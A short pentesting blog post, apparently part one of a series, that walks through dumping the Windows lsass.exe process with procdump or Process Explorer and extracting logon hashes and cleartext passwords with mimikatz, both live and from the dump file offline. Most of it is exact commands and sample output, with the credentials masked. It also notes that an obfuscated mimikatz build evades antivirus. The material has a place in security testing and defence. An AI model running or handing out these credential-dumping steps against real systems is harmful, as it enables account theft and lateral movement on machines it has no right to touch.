govolution

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Advertisements
Part 1 is simple. Dump the lsass.exe process and use mimikatz for getting the credentials as clear text and the hashes. You need admin or system rights for this.
But as a short reminder first let’s have a look at the “normal” way for dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege ’20’ OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self compiled or otherwise obfuscated mimikatz version every antivirus scanner will do its work. But it is also possible to read credentials from memory dump.
Make memory dump with Process explorer:
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have access over a shell.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : ‘e:\lsass.dmp’
mimikatz # sekurlsa::logonPasswords
Opening : ‘e:\lsass.dmp’ file for minidump…
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
Overview:
https://govolution.wordpress.com/2016/02/06/memdumps-volatility-mimikatz-vms-overview/
Links:
https://github.com/gentilkiwi/mimikatz
https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
https://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html
Advertisements